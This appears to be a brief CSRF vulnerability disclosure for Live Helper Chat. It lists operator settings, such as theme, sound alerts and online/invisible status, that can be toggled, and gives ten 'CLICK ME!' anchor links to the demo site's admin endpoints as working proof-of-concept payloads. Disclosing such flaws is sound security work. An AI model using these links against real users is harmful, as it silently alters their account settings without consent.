CSRF in switching between enable and disable of the following:
- Dark/bright
- Auto uppercase sentences
- Do not scroll to the bottom on chat open
- Auto preload previous visitor chat messages
- Load previous message on scroll
- New messages
- New chats
- Online
- Based on activity
- Visible
<a href="https://demo.livehelperchat.com/site_admin/front/switchdashboard/(action)/mode">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/auto_uppercase/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/no_scroll_bottom/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/auto_preload/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsetting/scroll_load/1">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsettingajax/chat_message/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setsettingajax/new_chat_sound/0">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setoffline/true">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setalwaysonline/true">CLICK ME!</a>
<a href="https://demo.livehelperchat.com/site_admin/user/setinvisible/true">CLICK ME!</a>
This vulnerability is capable of tricking users to enable/disable personal settings on their accounts.